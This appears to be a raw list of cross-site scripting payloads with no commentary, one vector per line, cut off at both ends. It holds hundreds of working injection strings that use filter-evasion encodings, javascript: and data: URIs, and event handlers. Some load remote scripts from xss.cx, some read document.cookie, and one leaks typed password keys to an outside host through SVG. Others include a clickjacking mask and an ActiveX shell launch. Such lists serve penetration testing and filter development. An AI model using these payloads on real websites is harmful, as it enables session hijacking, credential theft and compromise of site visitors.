CONTENT=\"0;url=javascript:confirm(document.location);\">\n<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>\n<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.cx/scriptlet.html\"></OBJECT>\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>\nPHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+\n<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>\n<SCR%00IPT>confirm(document.location)</SCR%00IPT>\n<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>\n<SCRIPT SRC=\"http://xss.cx/xss.jpg\"></SCRIPT>\n<SCRIPT SRC=http://xss.cx/xss.js?<B>\n<SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT a=`>` SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#\n</SCRIPT>\">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>\n<SCRIPT/XSS SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT>a=document.cookie\n<SCRIPT>confirm(document.location);</SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.cx/xss.js\"></SCRIPT>\nSRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<STYLE TYPE=\"text/javascript\">confirm(document.location);</STYLE>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:confirm(document.location)\")}</STYLE>\n<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:confirm(document.location)\");}</STYLE><A CLASS=XSS></A>\n<STYLE>@import'http://xss.cx/xss.css';</STYLE>\n\"><STYLE>@import\"javascript:confirm(document.location)\";</STYLE>\n<STYLE>@im\\port'\\ja\\vasc\\ript:confirm(document.location)';</STYLE>\n<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n<TABLE BACKGROUND=\"javascript:confirm(document.location)\">\n[U+2028]prompt(1)[U+2028]-->\n&#X000003C\n&#X000003C;\n&#X000003E\n&#X000003E;\n&#X000003c\n&#X000003c;\n&#X000003e\n&#X000003e;\n&#X00003C\n&#X00003C;\n&#X00003E\n&#X00003E;\n&#X00003c\n&#X00003c;\n&#X00003e\n&#X00003e;\n&#X0003C\n&#X0003C;\n&#X0003E\n&#X0003E;\n&#X0003c\n&#X0003c;\n&#X0003e\n&#X0003e;\n&#X003C\n&#X003C;\n&#X003E\n&#X003E;\n&#X003c\n&#X003c;\n&#X003e\n&#X003e;\n&#X03C\n&#X03C;\n&#X03E\n&#X03E;\n&#X03c\n&#X03c;\n&#X03e\n&#X03e;\n&#X3C\n&#X3C;\n&#X3E\n&#X3E;\n&#X3c\n&#X3c;\n&#X3e\n&#X3e;\nXXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red}   /* all UA */*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */</style>\nX<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >\n<a  href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click  Me</a>\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<a b=\"c\">d</a>\n<a data-remote=true data-method=delete href=/delete_account>CLICK</a>\n<a href=````>\n<a href=\"#\" onClick=\"alert(document.domain)\"><img title=\"Click me\" /></a>\n<a href=\"#\" onclick=\"confirm(' &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ')\">name</a>\n<a href='#' onmouseover =\"javascript:$('a').html(5)\">a link</a>\n<a href=\"#\" ping=\"file://%00/%00/x\">Boom</a><script>document.querySelector('a').click();</script>\n<a href= /whatever>\n<a href=\"// ͥ.ws\">CLICK\n<a href=[0x0b]\" onclick=confirm(1)//\">click</a>\n<a href=\"&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49\">Clickhere</a>\n\"><a href=\"JAVASCRIPT:%E2%80%A8alert`1`\">CLICKME\n<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>\n<a href=``calc``>\n<a href=\"data:\\@['{§(`__`)$}']@\\, % 3 c script % 3 e alert(1) % 3 c/script %3 e\">click</a>\n<a href=\"data:　, &lt &NewLine; script &gt alert(1) &lt /script &gt \">CLICK\n<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\n<a href=\"data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">click</a>\n<a href=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"><img src=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"></a>\n<a href=\"data:text/html,%3cscript>confirm &#40;1&#41;&lt;/script&gt;\" >hello\n<a href=\"data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+\">click</a>\n\"/><a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n<a href=\"data:text/html,<script>eval(name)</script>\" target=\"confirm(1)\">click</a>\n<a href=``explorer.exe``>\n<a href=\"http://attacker.org\">\t<iframe src=\"http://example.org/\"></iframe></a>\n<a href=\"invalid:1\" id=x name=y>test</a>\n\"/><a href=\"invalid:2\" id=x name=y>test</a>\n<a href=\"j&#00000000000000097vascript:window['confirm'](1)\">aa</a>\n<a href=\"jAvAsCrIpT&colon;confirm&lpar;1&rpar;\">X</a>\n<a href=\"jAvAsCrIpT&colon;confirm&lpar;1&rpar;\">X</a>\n<a href=\"javas&Tab;cri&NewLine;pt:confirm(1)\">test</a>\n<a href=\"javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)\">click</a>\n<a href=\"//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0\">Right click open in new tab</a>\n<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>\n\"/><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>\n\"><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>\n<a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click-XSS</a>\n\"><a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<a href=\"javascript:data:alert(1)\">click</a>\n<a href=\"javascript:_e({}, 'cvml', 'test-01-%27-alert(1)-%27');\" target=\"_blank\">test</a>\n<a href=\"javascript:'hello'\" rel=\"sidebar\">x</a>\n<a href=\"javascript:history:alert(this.history.length)\">click</a>\n<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>\n<a href=\"javascript:name\">CLICK</a>\n<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:confirm(1)&NewLine;>X</a>\n<a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme\na href=\"j&#x26;#x26#x41;vascript:confirm%252831337%2529\">Hello</a>\n<a href=\"mailto:test-01-%27-alert(1)-%27-test@test.com\">test</a>\n<a href=``mspaint.exe``>\n<a href=``notepad.exe``>\n<a href=``shell:System``>\n<a href='vbscript:\"&#x5c&quot&confirm(1)&#39&#39\"'>\n<a href=\"x:confirm(1)\" id=\"test\">click</a><script>eval(test+'')</script>\n<a href=``xss.cx``>\n<a id=\"x\" href='http://adspecs.yahoo.com/adspecs.php' target=\"close(/*grabcookie(1)*/)\">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>\n<a onhelp='eval(href+\"confirm(1)\")'contenteditable='true'href='&#32;javascript:'>click</a>\n<a rel=\"noreferrer\" href=\"//xss.cx\">click</a>\n<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>\n<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>\n<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>\n<a target=_blank href=\"data:text/html,<script>confirm(opener.document.body.innerHTML)</script>\">clickme in Opera/FF</a>\n<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E\n<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>\n<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>\n<a\"'%0A`= +%20>;test<a\"'%0A`= +%20>?test<a\"'%0A`= +%20>;#test<a\"'%0A`= +%20>;\n<a\"'%0A`= +%20>;test<a\"'%0A`= +%20>?test<a\"'%0A`= +%20>;&x=\"><img src=x onerror=prompt(1);>#\"><img src=x onerror=prompt(1);>test<a\"'%0A`= +%20>;\n<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\nabout://xss.cx\n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\\n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\n<a/href[\\0C]=ja&Tab;vasc&Tab;ript&colon;confirm(1)>XXX</a>\n<a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>\n<a$href=\"data:text/html,%style=\"\"3cscript>confirm((1)</sstyle=\"\"cript>\" onerror=>hello\n<a/href=java&Tab;script:confirm%28/XSS/%29>click</a>\n<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))\n![a](javascript:prompt(document.cookie))\\\n[a](javascript:prompt(document.cookie))\nalert(1 ===  1)\n<anything onmouseover=javascript:confirm(1)>\n![a'\"`onerror=prompt(document.cookie)](x)\\\n<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6 C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>xss\n<applet onerror=alert('xss')> \n<applet/object onerror=alert(1)>\na=<script>alert(1);/*&b=*/</script>\n<a\u000b[\\x0B]onmosemove=confirm('\\Done\\')>\n<a[\\x0B]\u000bonmouseover\u000b=location=’jav\\x41script\\x3aconfirm\\x28″ZDresearch”\\x29′>ZDresearch\n[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)\n<b onbeforescriptexecute=alert(1)>\n<b <script>alert(1)//</script>0</script></b>\n<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>\n<base href=data:/,0/><script src=alert(1)></script>\n<base href=\"data:\\\"><link rel=import href='q,<script>alert(1)</script>'>\n<base href=\"javascript:\\\"> <a href=\"//%00confirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//%0a%0dconfirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//%0aalert(5);//\">\n<base href=\"javascript:\\\"> <a href=\"//%0aconfirm(2);//\">XSS</a>\n<base href=\"javascript:\\\"> <a href=\"//xss.cx/xss.js\">XSS</a>\n<base href=\"javascript:/\"><a href=\"**/alert(1)\">\n<base href=\"mailto://any/<img src=\"bod#y\"></script>\n<base target=\"<script>alert(1)</script>\">\n<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>\n<body language=vbs onload=confirm-1\n<body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'>\n\"><body language=vbs onload=window.location='http://xss.cx'>\n<body oninput=alert(1)><input autofocus>\n<body onload='vbs:Set x=CreateObject(\"Msxml2.XMLHTTP\"):x.open\"GET\",\".\":x.send:MsgBox(x.responseText)'>\n<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<body style=\"height:1000px\" onwheel=\"[DATA]\">\n<body style=\"height:1000px\" onwheel=\"prom%25%32%33%25%32%36x70;t(1)\">\n<body/onactivate=URL=name//\n<body/onload=&lt;!--&gt;&#10confirm(1)>\n<body/onload=&lt;!--&gt;&#10confirm(1)>\n\"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\"\n\"\\\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\",\n<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\n><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\n<body/onpageshow=alert(1)>\n\"><b/onclick=\"javascript:window.window.window['confirm'](1)\">bold\n<b><script<b></b><alert(1)</script </b></b>\n<button autofocus onfocus=confirm(2)>\n<button onclick=\"window.open('http://xss.cx/::Error138 ');\">CLICKME\n\"<button>'><img src=x onerror=confirm(0);></button>\"\n<button>'><img src=x onerror=confirm(0);></button>\n<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>\ncharset=utf-\n'`\"><*chr*script>log(*num*)</script>\n<cite><a href=\"javascript:confirm(1);\">XSS cited!</a></cite>\n[citelol]: (javascript:prompt(document.cookie))\n<command onmouseover=\"javascript:confirm(0);\">Save //\n<comment><img src=\"</comment><img src=x onerror=alert(1)//\">\n<comment/>&lt;/comment&gt;&lt;iframe/onload=alert(1)&gt;\n<ſcript/async/src=//⒛₨>\n<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=\"customLog('*datahtmlelements* *dataevents*')\"></*datahtmlelements*>\n<*datahtmlelements* *dataevents*=\"javascript:parent.customLog('*datahtmlelements* *dataevents*')\"></*datahtmlelements*>\n<*datahtmlelements* *datahtmlattributes*=\"javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')\"></*datahtmlelements*>\ndata:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1)\ndata:text/html,<script>alert(document.domain)</script>\ndata:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//>\n',__defineSetter__('x',alert),x=1,'\n<details ontoggle=alert(1)>\n<details ontoggle=\"aler\\u0074(1)\">\n<details open ontoggle=\"alert(1)\">\n<details open ontoggle=alert(1)>\n<div  style=\"\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;\">XXX</div>\n<div  style=\"position:absolute;top:0;left:0;width:100%;height:100%\"  onmouseover=\"prompt(1)\" onclick=\"confirm(1)\">x</button>?f\n<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>\n<div contextmenu=x>right-click<menu id=x onshow=confirm(1)> \n<div contextmenu=\"xss\">Right-Click Here<menu id=\"xss\" onshow=\"alert(1)\">\n<div contextmenu=\"xss\">Right-Click Here<menu id=\"xss\" onshow=\"alert(1)\">\n<div contextmenu=\"xss\">Right-Click Here<menu id=\"xss\"onshow=\"prom%25%32%33%25%32%36x70;t(1)\">\n<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\t<h1>Drop me</h1></div><iframe src=\"http://www.example.org/dropHere.html\"></iframe>\n<div id=\"confirm(2)\" style=\"x:expression(eval)(id)\">\n<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div><script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>\n<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>\n<div id=\"x\">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>\n<div id=\"x\">x</div><xml:namespace prefix=\"t\"><import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;\">\n<div onfocus=alert('xx') id=xss style=display:table>\n<div onfocus=alert('xx') id=xss style=display:table>\n<div onmouseover='confirm&lpar;1&rpar;'>DIV</div>\n<div onmouseover='confirm&lpar;1&rpar;'>DIV</div>\n<div style=\"[a]color[b]:[c]red\">XXX</div>\n<div style=animation-name:x onanimationstart=alert(1)>\n<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>\n<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>\n<div style=\"color:rgb(''&#0;x:expression(confirm(URL=1))\"></div>\n<div style=\"font-family:'foo[a];color:red;';\">XXX</div>\n<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>\n<div style=\"font-family:foo}color=red;\">XXX</div>\n<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>\n<div style=overflow:-webkit-marquee onscroll=alert(1)>\n<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"confirm(1)\">x</button>\n<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>\n<div style='x:anytext/**/xxxx/**/n(alert(1)) (\"\\\"))))))expressio\\\")'>aa</div>\n<div style='x:anytext/**/xxxx/**/n(confirm(1)) (\"\\\"))))))expressio\\\")'>aa</div> //\n<div title=\"%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=confirm(1)&gt;\"></div>\n<%div%20style=xss:expression(prompt(1))>\n<div/onmouseover='confirm(1)'> style=\"x:\">\n<div/onmouseover='confirm(1)'> style=\"x:\">\n<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div>\n<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>\n<div/style=\"width:expression(confirm(1))\">X</div>\n<div='/x=&#39&gt&lt;iframe/onload=alert(1)&gt>\n<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x></doc>\n<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name=\"secret\" type=\"password\"></form><!-- injection --><svg height=\"50px\"><image xmlns:xlink=\"http://www.w3.org/1999/xlink\"><set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" /><set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" /><set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" /><set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" /></image></svg>\n<element onpointerover=alert(1)>\n<element onpointerover=alert(1)>\n<embed code=\"http://xss.cx/xss.swf\" allowscriptaccess=always></embed>\n<embed src=/ onload=alert(5)>\n<embed src=URL onload=alert(5)>\n<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<embed src=\"javascript:alert(1)\"></embed> // O10.10â, OM10.0â, GC6â, FF<img src=\"javascript:alert(2)\"><image src=\"javascript:alert(2)\"> // IE6, O10.10â, OM10.0â<script src=\"javascript:alert(3)\"></script> // IE6, O11.01â, OM10.1â\neval(\"\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29”)\n<event-source src=\"event.php\" onload=\"alert(1)\">\n<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://xss.cx/xss.js></SCRIPT>'\"-->\nexp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\n<fORm/hello^waf/aCTIon=j&Tab;avas&Tab;cript&NewLine;:alert/**/&lpar;docu&Tab;ment.coo&Tab;kie&rpar;><InPuT/TyPe=submit\n</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\nfor(i=10;i>1;i--)confirm(i);new ActiveXObject(\"WScript.shell\").Run('calc.exe',1,true);\n<form action=\"\" method=\"post\"><input name=\"username\" value=\"admin\" /><input name=\"password\" type=\"password\" value=\"secret\" /><input name=\"injected\" value=\"injected\" dirname=\"password\" /><input type=\"submit\"></form>\n<form action='data:text&sol;html,&lt;script&gt;confirm(1)&lt/script&gt'><button>CLICK\n<form action='java&Tab;scri&Tab;pt:confirm(1)'><button>CLICK\n<form action=\"javas&Tab;cript:confirm(1)\" method=\"get\"><input type=\"submit\" value=\"Submit\"></form>   \n<form id=\"myform\" value=\"\" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type=\"submit\" value=\"Absenden\"></form>\n<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>\n<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>\n<form name=location >\n<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X\n<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>\n<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>\n<form/action=javascript&#x0003A;eval(setTimeout(confirm(1)))><input/type=submit>\n//<form/action=javascript&#x3A;confirm&lpar;document&period;cookie&rpar;><input/type='submit'>//\n<form><button formaction=\"javascript:alert(1)\">X</button>\n<form><button formaction=javascript&colon;confirm(1)>CLICKME\n<form><iframe &#09;&#10;&#11; src=\"javascript&#58;confirm(1)\"&#11;&#10;&#09;;>\n<form><input type=submit formaction=//xss.cx><textarea name=x>\n<form><isindex formaction=\"javascript&colon;confirm(1)\"\n<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n<frameset onload=alert(1)>\n<frameset onpageshow=\"alert(1)\">  <body onpageshow=\"alert(1)\"\n<frameset><frame/src=//xss.cx> \n&gt\n&gt;\n<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>\n<html xmlns=\"http://www.w3.org/1999/xhtml\"xmlns:svg=\"http://www.w3.org/2000/svg\"><body style=\"background:gray\"><iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/><svg:svg><svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/></svg:mask></svg:svg></body></html>\nhttp://www.google<script 